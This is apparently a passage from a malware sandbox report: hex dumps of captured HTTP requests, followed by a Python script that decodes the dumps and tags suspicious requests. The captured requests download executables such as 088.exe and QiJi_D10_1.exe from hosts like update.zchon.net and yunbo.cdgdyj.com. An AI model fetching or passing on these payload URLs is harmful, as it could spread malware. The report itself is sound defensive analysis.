0x000000f0 (00240)   746f2e73 746f7265 2e71712e 636f6d0d   to.store.qq.com.
0x00000100 (00256)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000110 (00272)   702d416c 6976650d 0a0d0a              p-Alive....

0x00000000 (00000)   47455420 2f707362 3f2f5631 316f6350   GET /psb?/V11ocP
0x00000010 (00016)   754b344c 64653351 2f59394c 686b4379   uK4Lde3Q/Y9LhkCy
0x00000020 (00032)   2e597255 31467762 3361315a 2e34334f   .YrU1Fwb3a1Z.43O
0x00000030 (00048)   52507655 5a63315a 51547063 58477557   RPvUZc1ZQTpcXGuW
0x00000040 (00064)   6b437673 212f722f 64427742 41414141   kCvs!/r/dBwBAAAA
0x00000050 (00080)   41414141 20485454 502f312e 310d0a41   AAAA HTTP/1.1..A
0x00000060 (00096)   63636570 743a202a 2f2a0d0a 41636365   ccept: */*..Acce
0x00000070 (00112)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x00000080 (00128)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x00000090 (00144)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x000000a0 (00160)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000000b0 (00176)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000000c0 (00192)   7773204e 5420352e 313b2053 56313b20   ws NT 5.1; SV1; 
0x000000d0 (00208)   2e4e4554 20434c52 20322e30 2e353037   .NET CLR 2.0.507
0x000000e0 (00224)   3237290d 0a486f73 743a2072 6177746a   27)..Host: rawtj
0x000000f0 (00240)   2e70686f 746f2e73 746f7265 2e71712e   .photo.store.qq.
0x00000100 (00256)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f66696c 65732f30 38382e65   GET /files/088.e
0x00000010 (00016)   78652048 5454502f 312e310d 0a416363   xe HTTP/1.1..Acc
0x00000020 (00032)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000030 (00048)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000040 (00064)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000050 (00080)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000060 (00096)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000070 (00112)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000080 (00128)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000090 (00144)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000a0 (00160)   290d0a48 6f73743a 20757064 6174652e   )..Host: update.
0x000000b0 (00176)   7a63686f 6e2e6e65 740d0a43 6f6e6e65   zchon.net..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a434c52 20322e30 2e353037   e....CLR 2.0.507
0x000000e0 (00224)   3237290d 0a486f73 743a2072 6177746a   27)..Host: rawtj
0x000000f0 (00240)   2e70686f 746f2e73 746f7265 2e71712e   .photo.store.qq.
0x00000100 (00256)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f312e65 78652048 5454502f   GET /1.exe HTTP/
0x00000010 (00016)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000020 (00032)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x00000030 (00048)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x00000040 (00064)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000050 (00080)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000060 (00096)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000070 (00112)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000080 (00128)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000090 (00144)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000a0 (00160)   2079756e 626f2e63 64676479 6a2e636f    yunbo.cdgdyj.co
0x000000b0 (00176)   6d0d0a43 6f6e6e65 6374696f 6e3a204b   m..Connection: K
0x000000c0 (00192)   6565702d 416c6976 650d0a0d 0a6c6976   eep-Alive....liv
0x000000d0 (00208)   650d0a0d 0a434c52 20322e30 2e353037   e....CLR 2.0.507
0x000000e0 (00224)   3237290d 0a486f73 743a2072 6177746a   27)..Host: rawtj
0x000000f0 (00240)   2e70686f 746f2e73 746f7265 2e71712e   .photo.store.qq.
0x00000100 (00256)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000110 (00272)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....
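The dumps above are the raw request bytes, and several of them run past the header terminator into stale buffer contents, so any extraction has to decode the dump format faithfully and then stop at the first CRLF CRLF. The script below is an added example, not code from the original report or from the sandbox that produced it: it decodes this dump format back into bytes, checking that each line's offset continues the previous line, splits every request at its header terminator so that the stale tail is measured rather than parsed as headers, and applies a few triage checks (executable paths, non-standard ports, the fixed IE6/XP User-Agent). SAMPLE_DUMPS is two of the dumps above copied verbatim; the tag names, the regular expression and the triage thresholds are this example's own choices.

```python
import re

# One dump line: "0x<offset> (<decimal offset>)   <hex groups>   <ascii column>".
# The hex capture stops at the double space before the ASCII column.
DUMP_LINE = re.compile(r"^0x([0-9a-fA-F]{8}) \(\d+\) {3}((?:[0-9a-fA-F]{2,8} ?){1,4})")
# The User-Agent string seen on every request in the report (IE6 on Windows XP, .NET 2.0).
IE6_XP_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"


def decode_hexdump(text: str) -> list:
    """Return the bytes of each blank-line-separated dump block."""
    blocks, buf = [], bytearray()
    for line in text.splitlines():
        m = DUMP_LINE.match(line)
        if not m:
            if buf:                        # a non-dump line closes the current block
                blocks.append(bytes(buf))
                buf = bytearray()
            continue
        if int(m.group(1), 16) != len(buf):  # a gap or overlap means the dump is corrupt
            raise ValueError(f"offset {m.group(1)} does not follow the previous line")
        buf += bytes.fromhex(m.group(2).replace(" ", ""))
    if buf:
        blocks.append(bytes(buf))
    return blocks


def parse_request(raw: bytes) -> dict:
    """Parse one captured request, cutting at the first CRLF CRLF so that stale
    buffer bytes after the terminator never reach the header parser."""
    end = raw.find(b"\r\n\r\n")
    if end < 0:
        raise ValueError("no header terminator: truncated capture")
    lines = raw[:end].decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    host = headers.get("host", "")
    return {"method": method, "target": target, "version": version, "host": host,
            "url": f"http://{host}{target}", "user_agent": headers.get("user-agent", ""),
            "stale_bytes": len(raw) - end - 4}   # residue after the terminator, if any


def triage(req: dict) -> list:
    """Cheap triage tags; a fixed UA is a correlation aid, not an attribution."""
    tags = []
    if req["target"].split("?", 1)[0].lower().endswith((".exe", ".dll", ".scr")):
        tags.append("executable-download")
    _, _, port = req["host"].partition(":")
    if port and port != "80":
        tags.append(f"nonstandard-port:{port}")
    if req["user_agent"] == IE6_XP_UA:
        tags.append("ie6-xp-ua")
    if req["stale_bytes"]:
        tags.append("stale-buffer-tail")
    return tags


def analyse(text: str) -> list:
    return [dict(r, tags=triage(r)) for r in map(parse_request, decode_hexdump(text))]


# Two dumps copied verbatim from the Raw Pcap section above.
SAMPLE_DUMPS = """\
0x00000000 (00000)   47455420 2f677564 696e672f 51694a69   GET /guding/QiJi
0x00000010 (00016)   5f443130 5f312e65 78652048 5454502f   _D10_1.exe HTTP/
0x00000020 (00032)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000030 (00048)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x00000040 (00064)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x000000a0 (00160)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000b0 (00176)   20736f66 742e6b75 6e6a756e 2e6f7267    soft.kunjun.org
0x000000c0 (00192)   3a38310d 0a436f6e 6e656374 696f6e3a   :81..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f353561 38373133 355f3132   GET /55a87135_12
0x00000010 (00016)   30323030 30333230 2e657865 20485454   02000320.exe HTT
0x00000020 (00032)   502f312e 310d0a41 63636570 743a202a   P/1.1..Accept: *
0x00000030 (00048)   2f2a0d0a 41636365 70742d45 6e636f64   /*..Accept-Encod
0x00000040 (00064)   696e673a 20677a69 702c2064 65666c61   ing: gzip, defla
0x00000050 (00080)   74650d0a 55736572 2d416765 6e743a20   te..User-Agent:
0x00000060 (00096)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x00000070 (00112)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x00000080 (00128)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x00000090 (00144)   313b2053 56313b20 2e4e4554 20434c52   1; SV1; .NET CLR
0x000000a0 (00160)   20322e30 2e353037 3237290d 0a486f73    2.0.50727)..Hos
0x000000b0 (00176)   743a2079 756e626f 2e636467 64796a2e   t: yunbo.cdgdyj.
0x000000c0 (00192)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a6e    Keep-Alive....n
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
"""

if __name__ == "__main__":
    for r in analyse(SAMPLE_DUMPS):
        print(r["url"], r["tags"], f"stale={r['stale_bytes']}")
```

The second dump is the one whose tail ("n: Keep-Alive\r\n\r\n", 17 bytes) is buffer residue from the earlier 240-byte sinaimg.cn request; the parser reports it as stale_bytes instead of folding it into the headers. Feed the whole Raw Pcap section through analyse() to get every URL, host and port in one pass.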


Strings